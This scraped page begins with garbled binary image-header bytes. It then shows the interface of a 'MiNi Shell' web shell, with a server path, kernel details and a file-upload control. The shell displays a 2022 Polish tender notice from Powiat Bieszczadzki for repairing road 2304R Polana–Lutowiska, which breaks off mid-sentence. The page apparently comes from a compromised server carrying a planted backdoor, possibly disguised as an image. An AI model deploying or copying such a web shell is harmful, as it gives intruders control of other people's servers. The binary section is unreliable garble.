JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221110/0043548301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi powiatowej nr 2304R Polana - Lutowiska <br/>odcinkami w km 2+870-3+370, 3+855-3+885, 4+170-4+240, <br/>4+310-4+410, 4+880-4+910, 5+020-5+080, 5+450-5+600, <br/>6+175-6+235 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Bieszczadzki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370439953</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bełska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ustrzyki Dolne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134712511</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">134611073</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@bieszczadzki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bieszczadzki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi powiatowej nr 2304R Polana - Lutowiska <br/>odcinkami w km 2+870-3+370, 3+855-3+885, 4+170-4+240, <br/>4+310-4+410, 4+880-4+910, 5+020-5+080, 5+450-5+600, <br/>6+175-6+235 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-588549f8-610e-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00435483</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037215/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Remont drogi powiatowej nr 2304R Polana - Lutowiska odcinkami w km 2+870-3+370, 3+855-3+885, 4+170-4+240, 4+310-4+410, 4+880-4+910, 5+020-5+080, 5+450-5+600, 6+175-6+235</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/bieszczadzki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/bieszczadzki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korzystanie z Systemu możliwe jest na 2 sposoby, pod warunkiem spełnienia następujących<br/>minimalnych wymagań technicznych:a) Oprogramowanie zewnętrzne (dostawcy podpisu<br/>kwalifikowanego)• Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera<br/>ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11• Lista zalecanych<br/>przeglądarek internetowych: Google Chrome, Mozilla Firefox,Opera. Zalecane jest używanie<br/>najnowszych wersji przeglądarek• system operacyjny Windows 7 i późniejszeb) Oprogramowanie<br/>wbudowane w SmartPZP• zainstalowane środowisko Java w wersji min. 1.8 (jre)• w przypadku<br/>przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web•<br/>oprogramowanie SzafirHost w systemie operacyjnym.10. Użycie przez Wykonawcę do kontaktu z<br/>Zamawiającym środków komunikacji elektronicznej zapewnionych w Systemie jest uzależnione od<br/>uprzedniej akceptacji przez Wykonawcę Regulaminu korzystania z usług Systemu na witrynie<br/>internetowej przy zakładaniu profilu Wykonawcy. 11. Korzystanie z Systemu przez Wykonawców jest<br/>bezpłatne. 12. Użytkownikom Zewnętrznym Wykonawcy przysługuje prawo korzystania z asysty<br/>obejmującej wsparcie techniczne w kwestiach dotyczących korzystania z Systemu, polegające na<br/>doradztwie telefonicznym i e-mailowym na zasadach określonych w Regulaminie korzystania z usług<br/>Systemu13. W sytuacji awarii Systemu lub przerwy technicznej działania Systemu Zamawiający<br/>dopuszcza komunikację za pomocą poczty elektronicznej na adres: przetargi@bieszczadzki.pl (nie<br/>dotyczy składania ofert) - w temacie wiadomości należy wpisać –UWAGA ! Awaria platformy – numer<br/>postępowania.14. Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu<br/>wynosi 100 MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik<br/>skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików.15. Za datę przekazania<br/>oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej oraz innych informacji<br/>przyjmuje się datę ich przekazania do Systemu.16. W korespondencji związanej z niniejszym<br/>postępowaniem Wykonawcy powinni posługiwać się następującym znakiem postępowania:<br/>IZP.272.3.202117. Sposób sporządzenia podmiotowych środków dowodowych, przedmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń musi być zgody z wymaganiami<br/>określonymi w rozporządzeniu rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2021 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy 18. Dopuszczalne formaty przesyłanych<br/>danych tj. plików o wielkości do 100 MB w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt,<br/>.pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg19.<br/>Informacje na temat kodowania i czasu odbioru danych:20. Oferta/wniosek złożony/a przez<br/>Wykonawcę na Portalu , nie jest widoczny/a dla zamawiającego, ponieważ widnieje w Systemie jako<br/>zaszyfrowany/a. Możliwość otwarcia oferty/wniosku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert.21. Oznaczenie czasu odbioru danych przez Portal<br/>stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), znajdującą się<br/>na potwierdzeniu złożenia oferty/wniosku</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W postępowaniu są przetwarzane dane osobowe<br/>podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych<br/>osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679. Dane te mogą dotyczyć w<br/>szczególności samego wykonawcy (osoby fizycznej prowadzącej działalność gospodarczą), jego<br/>pełnomocnika (osoby fizycznej), jak też informacji o osobach, które w swojej ofercie wykonawca<br/>przedkłada celem wykazania spełniania warunków udziału w postępowaniu, braku podstaw do<br/>wykluczenia z postępowania, jak i potwierdzenia wymogów zamawiającego dotyczących wykonania<br/>przedmiotu zamówienia.9. W postępowaniu i po zakończeniu postępowania do przetwarzania danych<br/>osobowych osób fizycznych stosuje się przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych<br/>osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679.10. Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzenia 2016/679, zamawiający informuje, że: 1) administratorem danych osobowych osób<br/>fizycznych jest Starosta Bieszczadzki 2) Zamawiający wyznaczył Inspektora Ochrony Danych, z którym<br/>można się skontaktować pocztą elektroniczną na adres iod@bieszczadzki.pl3) dane osobowe osób<br/>fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznegoRafineria kultur – rewitalizacja<br/>zabytkowego budynku Rafinerii FANTO w Ustrzykach Dolnych na potrzeby Bieszczadzkiego Centrum<br/>Dziedzictwa Kulturowego. ETAP I.– Oznaczenie sprawy: IZP.272.3.20214) w odniesieniu do danych<br/>osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie<br/>do art. 22 rozporządzenia 2016/679;5) osoba fizyczna posiada:a) na podstawie art. 15 rozporządzenia<br/>2016/679 prawo dostępu do danych osobowych jej dotyczących;b) na podstawie art. 16<br/>rozporządzenia 2016/679 prawo do sprostowania swoich danych osobowych;c) na podstawie art. 18<br/>rozporządzenia 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679; d)<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna<br/>uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy rozporządzenia 2016/679;pozostałe zapisy dot. ochrony danych osobowych znajdują się w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenia zasady jawności, o których mowa w ust. 3 i<br/>art. 18 ust. 3-6 Pzp, stosuje się odpowiednio. osobie fizycznej nie przysługuje:a) w związku z art. 17<br/>ust. 3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych osobowych;b) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;c) na podstawie<br/>art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c<br/>rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.272.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1. Przedmiotem prac jest wykonanie robót remontowo – naprawczych:<br/><br/>a) uzupełnienie powstałych ubytków nawierzchni w postaci dziur, wybojów, wyrw oraz innego typu nierówności kruszywem odpowiedniej frakcji;<br/><br/>b) wzmocnienie podbudowy drogi poprzez zwiększenie grubości warstw kruszywem w miejscach jej zaniku, zajeżdżenia gruntem lub obsypania do przydrożnych rowów;<br/><br/>c) utwardzenie uzupełnionych warstw podbudowy drogi sprzętem zapewniającym wymagana nośność i trwałość nawierzchni;<br/><br/>d) wypoziomowanie istniejącej nierówności podbudowy szczególnie w miejscach jej styku z poboczami poprzez likwidacje podłużnych kolein wzdłuż osi drogi przy krawędziach zewnętrznych, które zostały wypłukane w wyniku działań wód opadowych i roztopowych- co wynika z kierunków spadku nawierzchni drogi;<br/><br/>e) oczyszczenie, zabezpieczenie i utwardzenie poboczy drogi w wskazanych odcinkach drogi, co ma na celu zabezpieczenie warstw podbudowy przed dalsza erozja, rozwarstwianiem zewnętrznych warstw nawierzchni oraz prawidłowe odprowadzenie wód opadowych;<br/><br/>f) udrożnienie, umocnienie i oczyszczenie z zakrzaczeń i mułu , rowów przydrożnych, co ma na celu prawidłowe odprowadzenie wód opadowych i roztopowych z nawierzchni drogi;<br/><br/>1.2 Wykonawca wykona przedmiot zamówienia zgodnie z przedmiarem robót we wskazanej lokalizacji zgodnie z załącznikiem do niniejszej SWZ. <br/><br/>1.3 Wykonawca ma obowiązek zastosowania się do uwag i stosowania rozwiązań przedstawionych przez Zamawiającego. <br/><br/>IV. 10. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja: <br/> <br/>1.	Przedmiar Zał. nr 1 do SWZ<br/>2.	Kosztorys ofertowy	Zał. nr 2 do SWZ<br/>3. Lokalizacja Zał. nr 3 do SWZ<br/>4.	Plan orientacyjny	Zał. nr 4 do SWZ<br/><br/>IV. 11. Wykonawca zobowiązany jest na własny koszt do opracowania stosownego projektu oznakowania robót i zyskania jego akceptacji przez organ zarządzający ruchem, wykonania i utrzymania oznakowania w trakcie prowadzenia robót.<br/><br/>IV. 12. Wyłoniony Wykonawca zobowiązany jest do :<br/><br/>- opracowania projektu zmiany organizacji ruchu na czas prowadzenia robót,<br/>- oznakowania utrudnień ruchu i zmianę organizacji ruchu oraz utrzymanie oznakowania w czasie prowadzenia robót w należytym stanie,<br/>- użycia do oznakowania robót znaków wielkości średniej – odblaskowych,<br/>- zapewnienia i zabezpieczenia dojść w trakcie realizacji robót,<br/>- zabezpieczenia mienia przed kradzieżą w czasie trwania budowy,<br/>- uporządkowania terenu po wykonaniu zamówienia,<br/>- poinformowania służb i przewoźników komunikacji zbiorowej o terminach występowania utrudnień. <br/><br/>Zamawiający nie dokonuje podziału zamówienia na części. Tym samym zamawiający <br/>nie dopuszcza składania ofert częściowych, o których mowa w art. 7 pkt 15 ustawy <br/>Pzp. <br/><br/>Powody niedokonania podziału: <br/><br/>Podział zamówienia na części w przedmiotowym postępowaniu mógłby spowodować <br/>trudności w skoordynowaniu działań wykonawców realizujących poszczególne części <br/>zamówienia, co mogłoby zagrozić właściwemu wykonaniu zamówienia oraz jego <br/>terminowej realizacji. Zakres zamówienia i jego wartość umożliwia ubieganie się <br/>o zamówienie wykonawcom z sektora małych i średnich przedsiębiorstw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium I. <br/><br/>„Cena” , określona w złotówkach<br/><br/>znaczenie kryterium - 60% (0,6);<br/>opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>Lcena = (Cmin/C) x 60,00 pkt<br/><br/>gdzie:<br/><br/>Lcena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/>Cmin - cena w ofercie z najniższą ceną;<br/>C - cena w ofercie ocenianej.<br/><br/>Kryterium II.<br/><br/>„Okres gwarancji na wykonane roboty budowlane”, określony w miesiącach<br/><br/>znaczenie kryterium - 40% (0,4);<br/>opis sposobu oceny ofert dla kryterium „Okres gwarancji”: <br/><br/>LOG = (OG / OGmax) x 40 pkt<br/>gdzie:<br/><br/>LOG - liczba uzyskanych punktów dla kryterium „Okres gwarancji” ocenianej oferty;<br/>OG - okres gwarancji w ofercie ocenianej<br/>OGmax - okres gwarancji w ofercie z najdłuższym okresem gwarancji<br/><br/>XXVII.1. Wykonawca podaje okres gwarancji w liczbach całkowitych oraz słownie w formularzu oferty stanowiącym załącznik nr 5 do SWZ. <br/><br/>XXVII.2. Okres gwarancji nie może być krótszy niż 12 miesięcy oraz dłuższy niż 48 miesięcy. <br/><br/>XXVII.3. W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji dłuższego niż 48 miesięcy:<br/><br/>a) do oceny ofert zostanie przyjęty okres gwarancji wynoszący 48 miesięcy,<br/>b) do umowy zostanie wpisany okres gwarancji podany w formularzu oferty.<br/><br/>XXVII.4. W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji krótszego niż 48 miesięcy, oferta tego wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 Pzp („Zamawiający odrzuca ofertę, jeżeli jej treść jest niezgodna z warunkami zamówienia”).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> XI.1. Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykaże, że:<br/><br/>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną 100 000,00 PLN;<br/><br/>XI.2. Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej, jeżeli wykaże, że:<br/><br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:<br/><br/> - 1 robotę budowlaną, polegającą na przebudowie lub remoncie dróg, wykonaniu nawierzchni bitumicznej o wartości min. 100 000,00 zł <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">XIII.1. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/><br/>a) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">XII.1. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu zamawiający żąda następujących podmiotowych środków dowodowych:<br/><br/>a) dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/><br/>b) wykazu robót wykonanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy roboty te zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych 